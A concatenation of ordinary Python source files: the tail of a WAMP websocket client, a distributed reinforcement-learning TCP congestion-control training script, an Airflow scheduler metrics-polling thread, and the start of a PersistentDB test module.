        :returns: the response message put on the per-request queue by
            dispatch_to_awaiting().
        :raises WAMPConnectionError: disconnected before sending, or a
            GOODBYE arrived instead of a real response.
        :raises Exception: no response within self.timeout seconds.
    """
    if self._state == STATE_DISCONNECTED:
        raise WAMPConnectionError("WAMP is currently disconnected!")
    wait_queue = queue.Queue()
    request_id = request.request_id
    self._requests_pending[request_id] = wait_queue
    self.send_message(request)
    try:
        res = wait_queue.get(block=True,timeout=self.timeout)
    except queue.Empty as ex:
        # FIX: drop the stale entry so a late reply is not delivered to a
        # queue nobody will ever read (previously this leaked an entry in
        # _requests_pending per timed-out request).
        self._requests_pending.pop(request_id, None)
        raise Exception("Did not receive a response!")
    # disconnect() floods all pending queues with GOODBYE messages.
    if isinstance(res, GOODBYE):
        raise WAMPConnectionError("WAMP is currently disconnected!")
    return res
def dispatch_to_awaiting(self,result):
    """ Send data to the appropriate queues

        Routes a router message to the queue created by
        send_and_await_response() for its request_id. During
        authentication, ABORT/WELCOME/GOODBYE go to the welcome queue
        instead.

        :raises Exception: the message carries no request_id at all.
    """
    # If we are awaiting to login, then we might also get
    # an abort message. Handle that here....
    if self._state == STATE_AUTHENTICATING:
        # If the authentication message is something unexpected,
        # we'll just ignore it for now
        if result == WAMP_ABORT \
           or result == WAMP_WELCOME \
           or result == WAMP_GOODBYE:
            self._welcome_queue.put(result)
        return

    # FIX: the original wrapped this whole section in a bare try/except
    # that converted *any* failure (even queue errors) into the
    # "no request id" message, masking the real exception. Only the
    # missing-attribute case should produce that error.
    request_id = getattr(result, 'request_id', None)
    if request_id is None:
        raise Exception("Response does not have a request id. Do not know who to send data to. Data: {} ".format(result.dump()))
    if request_id in self._requests_pending:
        self._requests_pending[request_id].put(result)
        del self._requests_pending[request_id]
def handle_welcome(self, welcome):
    """ Hey cool, we were told we can access the server!

        Deposits the WELCOME so hello() can finish the handshake.
    """
    self._welcome_queue.put(welcome)

def handle_result(self, result):
    """ Dispatch the result back to the appropriate awaiter
    """
    self.dispatch_to_awaiting(result)

def handle_goodbye(self, goodbye):
    """ Dispatch the result back to the appropriate awaiter

        Currently a no-op; disconnect handling happens elsewhere.
    """
    pass

def handle_subscribed(self, result):
    """ Handle the successful subscription
    """
    self.dispatch_to_awaiting(result)

def handle_registered(self, result):
    """ Handle the request registration
    """
    self.dispatch_to_awaiting(result)

def handle_error(self, error):
    """ OOops! An error occurred
    """
    self.dispatch_to_awaiting(error)

def handle_abort(self, reason):
    """ We're out?

        Unblocks hello() with the ABORT, then tears the connection down.
    """
    self._welcome_queue.put(reason)
    # NOTE(review): close() is not defined in the portion of this class
    # visible here — presumably defined further down; verify it exists.
    self.close()
    self.disconnect()
def handle_invocation(self, message):
    """ Passes the invocation request to the appropriate
        callback.

        Known registrations run on a WampInvokeWrapper worker thread so
        the handler can itself issue WAMP requests; unknown registration
        ids are answered with an ERROR message.
    """
    req_id = message.request_id
    reg_id = message.registration_id
    if reg_id in self._registered_calls:
        handler = self._registered_calls[reg_id][REGISTERED_CALL_CALLBACK]
        invoke = WampInvokeWrapper(self,handler,message)
        invoke.start()
    else:
        error_uri = self.get_full_uri('error.unknown.uri')
        self.send_message(ERROR(
            request_code = WAMP_INVOCATION,
            request_id = req_id,
            details = {},
            error = error_uri
        ))
def handle_event(self, event):
    """ Send the event to the subclass or simply reject

        Events for unknown subscription ids are silently dropped.
    """
    subscription_id = event.subscription_id
    if subscription_id in self._subscriptions:
        # Dispatch on a worker thread so the callback may itself make
        # WAMP requests without blocking the read loop.
        handler = self._subscriptions[subscription_id][SUBSCRIPTION_CALLBACK]
        WampSubscriptionWrapper(self,handler,event).start()
def handle_unknown(self, message):
    """ We don't know what to do with this. So we'll send it
        into the queue just in case someone wants to do something
        with it but we'll just blackhole it.
    """
    self.dispatch_to_awaiting(message)
def subscribe(self,topic,callback=None,options=None):
    """ Subscribe to a uri for events from a publisher

        :param topic: topic URI (uri_base prefix is applied on the wire).
        :param callback: invoked per event; defaults to a no-op.
        :returns: the SUBSCRIBED response message.
    """
    full_topic = self.get_full_uri(topic)
    result = self.send_and_await_response(SUBSCRIBE(
                  options=options or {},
                  topic=full_topic
              ))
    if result == WAMP_SUBSCRIBED:
        if not callback:
            callback = lambda a: None
        # Store the *unprefixed* topic: handle_join() re-subscribes via
        # this method, which re-applies the prefix.
        self._subscriptions[result.subscription_id] = [topic,callback]
    return result
def unsubscribe(self, subscription_id):
    """ Unsubscribe an existing subscription

        :param subscription_id: router-assigned id from subscribe().
        :returns: the UNSUBSCRIBED response message.
    """
    result = self.send_and_await_response(UNSUBSCRIBE(subscription_id=subscription_id))
    try:
        del self._subscriptions[subscription_id]
    except KeyError:
        # FIX: deleting a missing dict key raises KeyError, not IndexError,
        # so the original handler never fired and the error propagated.
        # Also supply the missing format argument (the message used to log
        # a literal '%s') and use warning() instead of the deprecated
        # warn() alias.
        logger.warning(
            "Subscription ID '%s' not found in local subscription list. "
            "Sent unsubscribe to router anyway.", subscription_id)
    return result
def publish(self,topic,options=None,args=None,kwargs=None):
    """ Publishes a messages to the server
    """
    topic = self.get_full_uri(topic)
    if options is None:
        # Default to acknowledged publishes so the caller gets a receipt.
        options = {'acknowledge': True}

    # Both the acknowledged and fire-and-forget paths send an identical
    # PUBLISH payload; only the wait-for-reply behaviour differs.
    request = PUBLISH(
        options=options or {},
        topic=topic,
        args=args or [],
        kwargs=kwargs or {}
    )

    if options.get('acknowledge'):
        # Block until the router confirms the publish.
        result = self.send_and_await_response(request)
        return result

    self.send_message(request)
    return None
def disconnect(self):
    """ Disconnect from the websocket and pause the process
        till we reconnect

        Sends GOODBYE (best effort), closes the websocket, flips the
        state to DISCONNECTED, and unblocks every pending request with
        a synthetic GOODBYE so callers don't wait out their timeouts.
    """
    logger.debug("Disconnecting")

    # Close off the websocket
    if self.ws:
        try:
            if self._state == STATE_CONNECTED:
                self.handle_leave()
                self.stop_heartbeat()
                self.send_message(GOODBYE(
                    details={},
                    reason="wamp.error.system_shutdown"
                ))
                logger.debug("Closing Websocket")
            try:
                self.ws.close()
            except Exception as ex:
                logger.debug("Could not close websocket connection because: {}".format(ex))
        except Exception as ex:
            logger.debug("Could not send Goodbye message because {}".format(ex))
            pass # FIXME: Maybe do better handling here
        self.ws = None

    # Cleanup the state variables. By settings this
    # we're going to be telling the main loop to stop
    # trying to read from a websocket and await a notice
    # of restart via a threading.Condition object
    self._state = STATE_DISCONNECTED

    # Send a message to all queues that we have disconnected
    # Without this, any requests that are awaiting a response
    # will block until timeout needlessly
    for request_id, request_queue in self._requests_pending.items():
        request_queue.put(GOODBYE(
            details={},
            reason="wamp.error.system_shutdown"
        ))
    self._requests_pending = {}

    # Reset heartbeat bookkeeping for the next session.
    self._last_ping_time = None
    self._last_pong_time = None

    self.handle_disconnect()
def shutdown(self):
    """ Request the system to shutdown the main loop and shutdown the system
        This is a one-way trip! Reconnecting requires a new connection
        to be made!
    """
    self._request_shutdown = True
    # Give the main loop up to ~10 seconds (100 x 0.1s) to notice the
    # request and flip the state to disconnected.
    remaining_checks = 100
    while remaining_checks and self._state != STATE_DISCONNECTED:
        time.sleep(0.1)
        remaining_checks -= 1
def start(self, **options):
    """ Initialize websockets, say hello, and start listening for events

        :param options: forwarded to ``connect()``
        :returns: self, so calls can be chained.
    """
    self.connect(**options)
    # FIX: Thread.isAlive() was removed in Python 3.9; is_alive() is the
    # portable spelling (available since Python 2.6).
    if not self.is_alive():
        super(WAMPClient,self).start()
    self.hello()
    return self
def reconnect(self):
    """ Attempt to reconnect to the WAMP server. This assumes the
        main loop is still running.
    """
    # A soft reset rebuilds the transport without tearing down the
    # client object, then the HELLO handshake is performed again.
    self.connect(soft_reset=True)
    self.hello()
    return self
def register(self,uri,callback,details=None):
    """Register ``callback`` as the handler for procedure ``uri``.

    Blocks until the router answers the REGISTER request.
    """
    full_uri = self.get_full_uri(uri)
    response = self.send_and_await_response(REGISTER(
                    details=details or {},
                    procedure=full_uri
                ))
    # On success, remember the registration so incoming invocations can
    # be dispatched back to the local callback.
    if response == WAMP_REGISTERED:
        self._registered_calls[response.registration_id] = [uri, callback]
    return response
def run(self):
    """ Waits and receives messages from the server. This
        function somewhat needs to block so is executed in its
        own thread until self._request_shutdown is called.
    """
    while not self._request_shutdown:
        # Find out if we have any data pending from the
        # server
        try:
            # Age of the last heartbeat response (None until the first
            # pong arrives).
            if self._last_pong_time:
                since_last_pong = time.time() - self._last_pong_time
            else:
                since_last_pong = None

            # If we've been asked to stop running the
            # request loop. We'll just sit and wait
            # till we get asked to run again
            if self._state not in [STATE_AUTHENTICATING,STATE_WEBSOCKET_CONNECTED,STATE_CONNECTED]:
                self._request_loop_notify_restart.acquire()
                self._request_loop_notify_restart.wait(self.loop_timeout)
                self._request_loop_notify_restart.release()
                continue

            # If we don't have a websocket defined.
            # we don't go further either
            elif not self.ws:
                logger.debug("No longer have a websocket. Marking disconnected")
                self._state = STATE_DISCONNECTED
                continue

            if since_last_pong and since_last_pong > self.heartbeat_timeout:
                # If the last ping response happened too long
                # ago, consider it a websocket timeout and
                # handle disconnect.
                raise WAMPConnectionError("Maximum websocket response delay of %s secs exceeded.", self.heartbeat_timeout)

            # Okay, we think we're okay so let's try and read some data
            opcode, data = self.ws.recv_data(control_frame=True)
            if six.PY3 and opcode == websocket.ABNF.OPCODE_TEXT:
                data = data.decode('utf-8')

            # Heartbeat pong: the payload is the time.time() value we
            # sent in the matching ping.
            if opcode == websocket.ABNF.OPCODE_PONG:
                duration = time.time() - float(data)
                self._last_pong_time = time.time()
                data = None
                opcode = None
                logger.debug('Received websocket ping response in %s seconds', round(duration, 3))
                continue

            # Ignore any other control frames.
            if opcode not in (websocket.ABNF.OPCODE_TEXT, websocket.ABNF.OPCODE_BINARY):
                continue

        except io.BlockingIOError:
            continue
        except websocket.WebSocketTimeoutException:
            # recv timed out; loop again so shutdown requests are noticed.
            continue
        except (websocket.WebSocketConnectionClosedException, WAMPConnectionError, socket.error) as ex:
            # NOTE(review): this format string has no {} placeholder, so
            # the exception text is dropped from the log line.
            logger.debug("WebSocket Exception. Requesting disconnect:".format(ex))
            self._state = STATE_DISCONNECTED
            self.stop_heartbeat()
            self.disconnect()

            # If the server disconnected, let's try and reconnect
            # back to the service after a random few seconds
            if self.auto_reconnect:
                # As doing a reconnect would block and would then
                # prevent us from ticking the websoocket, we'll
                # go into a subthread to deal with the reconnection
                def reconnect():
                    self.reconnect()
                t = threading.Thread(target=reconnect)
                t.start()
                # FIXME: need to randomly wait
                time.sleep(1)
            # NOTE(review): `data` here is whatever a previous iteration
            # left behind (possibly unset on the first pass) -- confirm.
            if not data: continue
        except Exception as ex:
            logger.error("ERROR in main loop: {}".format(ex))
            continue

        # Dispatch the decoded message to handle_<code_name>() when such
        # a handler exists, otherwise to handle_unknown().
        try:
            logger.debug("<RCV: {}".format(data))
            message = WampMessage.loads(data)
            logger.debug("<RCV: {}".format(message.dump()))
            try:
                code_name = message.code_name.lower()
                handler_name = "handle_"+code_name
                handler_function = getattr(self,handler_name)
                handler_function(message)
            except AttributeError as ex:
                self.handle_unknown(message)
        except Exception as ex:
            logger.error("ERROR in main loop when receiving: {}".format(ex))
class WAMPClientTicket(WAMPClient):
    """WAMP client that answers CHALLENGE with the WAMP-Ticket method."""

    # Credentials used when the router issues a CHALLENGE.
    username = None
    password = None

    def __init__(
                self,
                password=None,
                username=None,
                **kwargs
            ):
        # Default to ticket authentication unless the caller explicitly
        # requested other authmethods.
        if not kwargs.get('authmethods'):
            kwargs['authmethods'] = ['ticket']
        super(WAMPClientTicket,self).__init__(**kwargs)
        self.daemon = True
        self.configure(
            password = password,
            username = username,
            **kwargs
        )

    def configure(self, **kwargs):
        """Store credentials; ``username`` doubles as the WAMP authid."""
        # Just alias username to make things "easier"
        if 'username' in kwargs:
            kwargs.setdefault('authid',kwargs['username'])
        super(WAMPClientTicket,self).configure(**kwargs)
        for k in ('password',):
            if k in kwargs:
                setattr(self,k,kwargs[k])

    def handle_challenge(self,data):
        """ Executed when the server requests additional
            authentication
        """
        # Send challenge response. NOTE(review): the password is sent
        # verbatim as the ticket signature -- presumably the transport
        # is expected to be TLS; confirm.
        self.send_message(AUTHENTICATE(
            signature = self.password,
            extra = {}
        ))
|
d5.py | '''
MIT License
Copyright (c) Chen-Yu Yen - Soheil Abbasloo 2020
Permission is hereby granted, free of charge, to any person obtaining a copy
of this software and associated documentation files (the "Software"), to deal
in the Software without restriction, including without limitation the rights
to use, copy, modify, merge, publish, distribute, sublicense, and/or sell
copies of the Software, and to permit persons to whom the Software is
furnished to do so, subject to the following conditions:
The above copyright notice and this permission notice shall be included in all
copies or substantial portions of the Software.
THE SOFTWARE IS PROVIDED "AS IS", WITHOUT WARRANTY OF ANY KIND, EXPRESS OR
IMPLIED, INCLUDING BUT NOT LIMITED TO THE WARRANTIES OF MERCHANTABILITY,
FITNESS FOR A PARTICULAR PURPOSE AND NONINFRINGEMENT. IN NO EVENT SHALL THE
AUTHORS OR COPYRIGHT HOLDERS BE LIABLE FOR ANY CLAIM, DAMAGES OR OTHER
LIABILITY, WHETHER IN AN ACTION OF CONTRACT, TORT OR OTHERWISE, ARISING FROM,
OUT OF OR IN CONNECTION WITH THE SOFTWARE OR THE USE OR OTHER DEALINGS IN THE
SOFTWARE.
'''
import threading
import logging
import tensorflow as tf
import sys
from agent import Agent
import os
os.environ['TF_CPP_MIN_LOG_LEVEL'] = '3'
import argparse
import gym
import numpy as np
import time
import random
import datetime
import sysv_ipc
import signal
import pickle
from utils import logger, Params
from envwrapper import Env_Wrapper, TCP_Env_Wrapper, GYM_Env_Wrapper
def create_input_op_shape(obs, tensor):
    """Reshape *obs* to match *tensor*'s shape, with unknown dims as -1."""
    target_shape = [dim if dim else -1 for dim in tensor.shape.as_list()]
    return np.reshape(obs, target_shape)
def evaluate_TCP(env, agent, epoch, summary_writer, params, s0_rec_buffer, eval_step_counter):
    """Run one evaluation episode and log step/episode summaries.

    Returns the updated ``eval_step_counter``.

    NOTE(review): when use_TCP is set, ``s0`` is never initialized here
    (no env.reset()), so the non-recurrent action branch depends on
    caller-provided state -- confirm.
    NOTE(review): ``start_time`` is assigned but never used.
    """
    score_list = []
    eval_times = 1
    eval_length = params.dict['max_eps_steps']
    start_time = time.time()

    for _ in range(eval_times):
        step_counter = 0
        ep_r = 0.0
        # TCP environments are long-lived; only non-TCP (gym-style)
        # environments are reset per episode.
        if not params.dict['use_TCP']:
            s0 = env.reset()
        # Deterministic (non-exploring) action: second argument False.
        if params.dict['recurrent']:
            a = agent.get_action(s0_rec_buffer, False)
        else:
            a = agent.get_action(s0, False)
        a = a[0][0]
        env.write_action(a)

        while True:
            eval_step_counter += 1
            step_counter += 1
            s1, r, terminal, error_code = env.step(a, eval_=True)

            if error_code == True:
                # Slide the recurrent window: drop the oldest state,
                # append the newest.
                s1_rec_buffer = np.concatenate( (s0_rec_buffer[params.dict['state_dim']:], s1) )
                if params.dict['recurrent']:
                    a1 = agent.get_action(s1_rec_buffer, False)
                else:
                    a1 = agent.get_action(s1, False)
                a1 = a1[0][0]
                env.write_action(a1)
            else:
                # Bad state from the environment: re-send the previous
                # action and retry.
                print("Invalid state received...\n")
                env.write_action(a)
                continue

            ep_r = ep_r+r

            # Periodic per-step TensorBoard logging.
            if (step_counter+1) % params.dict['tb_interval'] == 0:
                modified_action = env.map_action(a)
                alpha = modified_action[0]
                beta = modified_action[1]
                summary = tf.summary.Summary()
                summary.value.add(tag='Eval/Step/0-Alpha', simple_value=alpha)
                summary.value.add(tag='Eval/Step/0-Beta', simple_value=beta)
                summary.value.add(tag='Eval/Step/2-Reward', simple_value=r)
                summary_writer.add_summary(summary, eval_step_counter)

            s0 = s1
            a = a1
            if params.dict['recurrent']:
                s0_rec_buffer = s1_rec_buffer

            # Episode ends at the step budget or on a terminal signal.
            if step_counter == eval_length or terminal:
                score_list.append(ep_r)
                break

    # Episode-level return summary.
    summary = tf.summary.Summary()
    summary.value.add(tag='Eval/Return', simple_value=np.mean(score_list))
    summary_writer.add_summary(summary, epoch)
    return eval_step_counter
class learner_killer():
    """Persists the learner's replay buffer to disk when SIGTERM arrives."""

    def __init__(self, buffer):
        # Replay buffer to serialize from the signal handler.
        self.replay_buf = buffer
        print("learner register sigterm")
        signal.signal(signal.SIGTERM, self.handler_term)
        print("test length:", self.replay_buf.length_buf)

    def handler_term(self, signum, frame):
        # Relies on the module-level ``config``/``params`` set in main().
        # Only save when training (not in eval mode).
        if not config.eval:
            with open(os.path.join(params.dict['train_dir'], "replay_memory.pkl"), "wb") as fp:
                pickle.dump(self.replay_buf, fp)
            print("test length:", self.replay_buf.length_buf)
            print("--------------------------Learner: Saving rp memory--------------------------")
        print("-----------------------Learner's killed---------------------")
        sys.exit(0)
def main():
    """Entry point: build the TF cluster, then run as learner or actor.

    Roles (selected by --job_name):
      * learner -- trains the agent from experience dequeued from a
        shared FIFO queue, on a background dequeue thread.
      * actor   -- interacts with the (TCP or gym) environment and
        enqueues experience tuples for the learner.
    """
    tf.get_logger().setLevel(logging.ERROR)

    parser = argparse.ArgumentParser()
    parser.add_argument('--load', action='store_true', default=False, help='default is %(default)s')
    parser.add_argument('--eval', action='store_true', default=False, help='default is %(default)s')
    parser.add_argument('--tb_interval', type=int, default=1)
    parser.add_argument('--train_dir', type=str, default=None)
    parser.add_argument('--mem_r', type=int, default = 123456)
    parser.add_argument('--mem_w', type=int, default = 12345)
    parser.add_argument('--base_path',type=str, required=True)
    parser.add_argument('--job_name', type=str, choices=['learner', 'actor'], required=True, help='Job name: either {\'learner\', actor}')
    parser.add_argument('--task', type=int, required=True, help='Task id')

    ## parameters from parser
    global config
    global params
    config = parser.parse_args()

    ## parameters from file
    params = Params(os.path.join(config.base_path,'params.json'))

    if params.dict['single_actor_eval']:
        # Single-process evaluation: no cluster, local server only.
        local_job_device = ''
        shared_job_device = ''
        def is_actor_fn(i): return True
        global_variable_device = '/cpu'
        is_learner = False
        server = tf.train.Server.create_local_server()
        filters = []
    else:
        # Distributed setup: one learner task plus N actor tasks.
        local_job_device = '/job:%s/task:%d' % (config.job_name, config.task)
        shared_job_device = '/job:learner/task:0'
        is_learner = config.job_name == 'learner'
        global_variable_device = shared_job_device + '/cpu'
        def is_actor_fn(i): return config.job_name == 'actor' and i == config.task
        if params.dict['remote']:
            cluster = tf.train.ClusterSpec({
                'actor': params.dict['actor_ip'][:params.dict['num_actors']],
                'learner': [params.dict['learner_ip']]
            })
        else:
            cluster = tf.train.ClusterSpec({
                'actor': ['localhost:%d' % (8001 + i) for i in range(params.dict['num_actors'])],
                'learner': ['localhost:8000']
            })
        server = tf.train.Server(cluster, job_name=config.job_name,
                                 task_index=config.task)
        filters = [shared_job_device, local_job_device]

    if params.dict['use_TCP']:
        env_str = "TCP"
        env_peek = TCP_Env_Wrapper(env_str, params,use_normalizer=params.dict['use_normalizer'])
    else:
        env_str = 'YourEnvironment'
        env_peek = Env_Wrapper(env_str)

    s_dim, a_dim = env_peek.get_dims_info()
    action_scale, action_range = env_peek.get_action_info()

    if not params.dict['use_TCP']:
        params.dict['state_dim'] = s_dim
    if params.dict['recurrent']:
        # Recurrent agents see a flat buffer of the last rec_dim states.
        s_dim = s_dim * params.dict['rec_dim']

    if params.dict['use_hard_target'] == True:
        params.dict['tau'] = 1.0

    with tf.Graph().as_default(),\
        tf.device(local_job_device + '/cpu'):

        # Fixed seeds for reproducibility.
        tf.set_random_seed(1234)
        random.seed(1234)
        np.random.seed(1234)

        actor_op = []

        tfeventdir = os.path.join( config.base_path, params.dict['logdir'], config.job_name+str(config.task) )
        params.dict['train_dir'] = tfeventdir
        if not os.path.exists(tfeventdir):
            os.makedirs(tfeventdir)
        summary_writer = tf.summary.FileWriterCache.get(tfeventdir)

        with tf.device(shared_job_device):
            agent = Agent(s_dim, a_dim, batch_size=params.dict['batch_size'], summary=summary_writer,h1_shape=params.dict['h1_shape'],
                        h2_shape=params.dict['h2_shape'],stddev=params.dict['stddev'],mem_size=params.dict['memsize'],gamma=params.dict['gamma'],
                        lr_c=params.dict['lr_c'],lr_a=params.dict['lr_a'],tau=params.dict['tau'],PER=params.dict['PER'],CDQ=params.dict['CDQ'],
                        LOSS_TYPE=params.dict['LOSS_TYPE'],noise_type=params.dict['noise_type'],noise_exp=params.dict['noise_exp'])

            # Shared experience queue: (s0, action, reward, s1, terminal).
            dtypes = [tf.float32, tf.float32, tf.float32, tf.float32, tf.float32]
            shapes = [[s_dim], [a_dim], [1], [s_dim], [1]]
            queue = tf.FIFOQueue(10000, dtypes, shapes, shared_name="rp_buf")

        if is_learner:
            with tf.device(params.dict['device']):
                agent.build_learn()
                agent.create_tf_summary()
            # Optionally warm-start the replay memory from disk.
            if config.load is True and config.eval==False:
                if os.path.isfile(os.path.join(params.dict['train_dir'], "replay_memory.pkl")):
                    with open(os.path.join(params.dict['train_dir'], "replay_memory.pkl"), 'rb') as fp:
                        replay_memory = pickle.load(fp)
            # Save the replay buffer if the learner receives SIGTERM.
            _killsignal = learner_killer(agent.rp_buffer)

        for i in range(params.dict['num_actors']):
            if is_actor_fn(i):
                if params.dict['use_TCP']:
                    # Shared memory segments bridge to the kernel-side
                    # TCP environment.
                    shrmem_r = sysv_ipc.SharedMemory(config.mem_r)
                    shrmem_w = sysv_ipc.SharedMemory(config.mem_w)
                    env = TCP_Env_Wrapper(env_str, params, config=config, for_init_only=False, shrmem_r=shrmem_r, shrmem_w=shrmem_w,use_normalizer=params.dict['use_normalizer'])
                else:
                    env = GYM_Env_Wrapper(env_str, params)

                # Placeholders for one experience tuple fed per step.
                a_s0 = tf.placeholder(tf.float32, shape=[s_dim], name='a_s0')
                a_action = tf.placeholder(tf.float32, shape=[a_dim], name='a_action')
                a_reward = tf.placeholder(tf.float32, shape=[1], name='a_reward')
                a_s1 = tf.placeholder(tf.float32, shape=[s_dim], name='a_s1')
                a_terminal = tf.placeholder(tf.float32, shape=[1], name='a_terminal')
                a_buf = [a_s0, a_action, a_reward, a_s1, a_terminal]

                with tf.device(shared_job_device):
                    actor_op.append(queue.enqueue(a_buf))

        if is_learner:
            Dequeue_Length = params.dict['dequeue_length']
            dequeue = queue.dequeue_many(Dequeue_Length)
            queuesize_op = queue.size()

        if params.dict['ckptdir'] is not None:
            params.dict['ckptdir'] = os.path.join( config.base_path, params.dict['ckptdir'])
            print("## checkpoint dir:", params.dict['ckptdir'])
            isckpt = os.path.isfile(os.path.join(params.dict['ckptdir'], 'checkpoint') )
            print("## checkpoint exists?:", isckpt)
            if isckpt== False:
                print("\n# # # # # # Warning ! ! ! No checkpoint is loaded, use random model! ! ! # # # # # #\n")
        else:
            params.dict['ckptdir'] = tfeventdir

        tfconfig = tf.ConfigProto(allow_soft_placement=True)

        if params.dict['single_actor_eval']:
            mon_sess = tf.train.SingularMonitoredSession(
                checkpoint_dir=params.dict['ckptdir'])
        else:
            mon_sess = tf.train.MonitoredTrainingSession(master=server.target,
                    save_checkpoint_secs=15,
                    save_summaries_secs=None,
                    save_summaries_steps=None,
                    is_chief=is_learner,
                    checkpoint_dir=params.dict['ckptdir'],
                    config=tfconfig,
                    hooks=None)

        agent.assign_sess(mon_sess)

        if is_learner:
            # ---------------- learner role ----------------
            if config.eval is True:
                # Eval learners only keep the session alive for actors.
                print("=========================Learner is up===================")
                while not mon_sess.should_stop():
                    time.sleep(1)
                    continue

            if config.load is False:
                agent.init_target()

            counter = 0
            start = time.time()
            dequeue_thread = threading.Thread(target=learner_dequeue_thread, args=(agent,params, mon_sess, dequeue, queuesize_op, Dequeue_Length),daemon=True)
            first_time=True

            while not mon_sess.should_stop():
                if first_time == True:
                    # Start draining the experience queue once the
                    # session is usable.
                    dequeue_thread.start()
                    first_time=False
                up_del_tmp=params.dict['update_delay']/1000.0
                time.sleep(up_del_tmp)
                # Wait for a minimal amount of experience before training.
                if agent.rp_buffer.ptr>200 or agent.rp_buffer.full :
                    agent.train_step()
                    if params.dict['use_hard_target'] == False:
                        # Soft (Polyak) target update every step.
                        agent.target_update()
                        if counter %params.dict['hard_target'] == 0 :
                            current_opt_step = agent.sess.run(agent.global_step)
                            logger.info("Optimize step:{}".format(current_opt_step))
                            logger.info("rp_buffer ptr:{}".format(agent.rp_buffer.ptr))
                    else:
                        # Hard target update every `hard_target` steps.
                        if counter %params.dict['hard_target'] == 0 :
                            agent.target_update()
                            current_opt_step = agent.sess.run(agent.global_step)
                            logger.info("Optimize step:{}".format(current_opt_step))
                            logger.info("rp_buffer ptr:{}".format(agent.rp_buffer.ptr))
                    counter += 1
        else:
            # ---------------- actor role ----------------
            start = time.time()
            step_counter = np.int64(0)
            eval_step_counter = np.int64(0)

            s0 = env.reset()
            s0_rec_buffer = np.zeros([s_dim])
            s1_rec_buffer = np.zeros([s_dim])
            # Seed the recurrent window with the initial observation.
            s0_rec_buffer[-1*params.dict['state_dim']:] = s0

            if params.dict['recurrent']:
                a = agent.get_action(s0_rec_buffer,not config.eval)
            else:
                a = agent.get_action(s0, not config.eval)
            a = a[0][0]
            env.write_action(a)

            epoch = 0
            ep_r = 0.0
            start = time.time()
            while True:
                start = time.time()
                epoch += 1
                step_counter += 1
                s1, r, terminal, error_code = env.step(a,eval_=config.eval)

                if error_code == True:
                    s1_rec_buffer = np.concatenate( (s0_rec_buffer[params.dict['state_dim']:], s1) )
                    if params.dict['recurrent']:
                        a1 = agent.get_action(s1_rec_buffer, not config.eval)
                    else:
                        a1 = agent.get_action(s1,not config.eval)
                    a1 = a1[0][0]
                    env.write_action(a1)
                else:
                    # Bad state: re-send the previous action and retry.
                    print("TaskID:"+str(config.task)+"Invalid state received...\n")
                    env.write_action(a)
                    continue

                # FIX: np.float was removed in NumPy 1.24; np.float32 also
                # matches the queue dtype (tf.float32).
                if params.dict['recurrent']:
                    fd = {a_s0:s0_rec_buffer, a_action:a, a_reward:np.array([r]), a_s1:s1_rec_buffer, a_terminal:np.array([terminal], np.float32)}
                else:
                    fd = {a_s0:s0, a_action:a, a_reward:np.array([r]), a_s1:s1, a_terminal:np.array([terminal], np.float32)}

                if not config.eval:
                    mon_sess.run(actor_op, feed_dict=fd)

                s0 = s1
                a = a1
                if params.dict['recurrent']:
                    s0_rec_buffer = s1_rec_buffer

                if not params.dict['use_TCP'] and (terminal):
                    if agent.actor_noise != None:
                        agent.actor_noise.reset()

                if (epoch% params.dict['eval_frequency'] == 0):
                    eval_step_counter = evaluate_TCP(env, agent, epoch, summary_writer, params, s0_rec_buffer, eval_step_counter)

            # NOTE(review): unreachable -- the loop above never breaks.
            print("total time:", time.time()-start)
def learner_dequeue_thread(agent,params, mon_sess, dequeue, queuesize_op, Dequeue_Length):
    """Continuously drain the shared TF queue into the agent's replay buffer.

    Runs forever; intended to be started as a daemon thread.
    """
    pulls = 0
    while True:
        pulls = pulls + 1
        batch = mon_sess.run(dequeue)
        states, actions, rewards, next_states, terminals = (
            batch[0], batch[1], batch[2], batch[3], batch[4])
        agent.store_many_experience(states, actions, rewards, next_states,
                                    terminals, Dequeue_Length)
        # Brief pause to avoid hammering the session.
        time.sleep(0.01)
def learner_update_thread(agent,params):
    """Background loop: one train step plus a target-network update every
    ``update_delay`` milliseconds.

    NOTE: appears unused in this file (main() trains inline); kept for
    backward compatibility. Removed the unused ``ct`` counter.
    """
    delay=params.dict['update_delay']/1000.0
    while True:
        agent.train_step()
        agent.target_update()
        time.sleep(delay)
# Script entry point.
if __name__ == "__main__":
    main()
|
patch_thread.py | import sys
from datetime import datetime, timedelta
from threading import Thread
from time import sleep
import sqlalchemy
from airflow.models import TaskInstance
from airflow.settings import Stats
from airflow.utils.db import provide_session
from pytz import utc
from airflow_metrics.utils.fn_utils import once
from airflow_metrics.utils.fn_utils import capture_exception
@provide_session
def task_states(_since, session=None):
    """Emit a gauge of task-instance counts per state.

    ``_since`` is accepted for interface parity with the other pollers
    but is ignored: the gauge always reflects the whole table.
    """
    counts_by_state = (
        session.query(TaskInstance.state, sqlalchemy.func.count())
        .group_by(TaskInstance.state)
    )
    for state, count in counts_by_state:
        # Rows with a NULL state are not reported.
        if state is None:
            continue
        Stats.gauge('task.state', count, tags={'state': state})
@provide_session
def bq_task_states(since, session=None):
    """Emit counters for BigQueryOperator tasks that ended after *since*."""
    recent_bq_counts = (
        session.query(TaskInstance.state, sqlalchemy.func.count())
        .filter(TaskInstance.operator == 'BigQueryOperator')
        .filter(TaskInstance.end_date > since)
        .group_by(TaskInstance.state)
    )
    for state, count in recent_bq_counts:
        # Rows with a NULL state are not reported.
        if state is None:
            continue
        Stats.incr('task.state.bq', count, tags={'state': state})
def forever(funcs, sleep_time):
    """Return a zero-argument callable that invokes every function in
    *funcs* once per cycle, sleeping *sleep_time* seconds between cycles.

    Each function receives a UTC-localized timestamp *sleep_time* seconds
    in the past (the start of the window it should report on).
    """
    lookback = timedelta(seconds=sleep_time)

    def wrapped():
        while True:
            for fn in funcs:
                window_start = datetime.utcnow() - lookback
                fn(utc.localize(window_start))
            sleep(sleep_time)

    return wrapped
@once
def patch_thread():
    """Start the background metrics-polling thread (at most once, via @once).

    Only activates when this process was launched as ``airflow scheduler``.
    """
    try:
        # Only the scheduler process should emit these polling metrics.
        if len(sys.argv) > 1 and sys.argv[1] == 'scheduler':
            funcs = [
                task_states,
                bq_task_states,
            ]
            # Poll every 10 seconds; daemon thread so it never blocks
            # interpreter shutdown.
            thread = Thread(target=forever(funcs, 10))
            thread.daemon = True
            thread.start()
    except Exception as ex:  # pylint: disable=broad-except
        # Best-effort instrumentation: report the failure, never crash
        # the scheduler.
        capture_exception(ex)
|
TestPersistentDB.py | """Test the PersistentDB module.
Note:
We don't test performance here, so the test does not predicate
whether PersistentDB actually will help in improving performance or not.
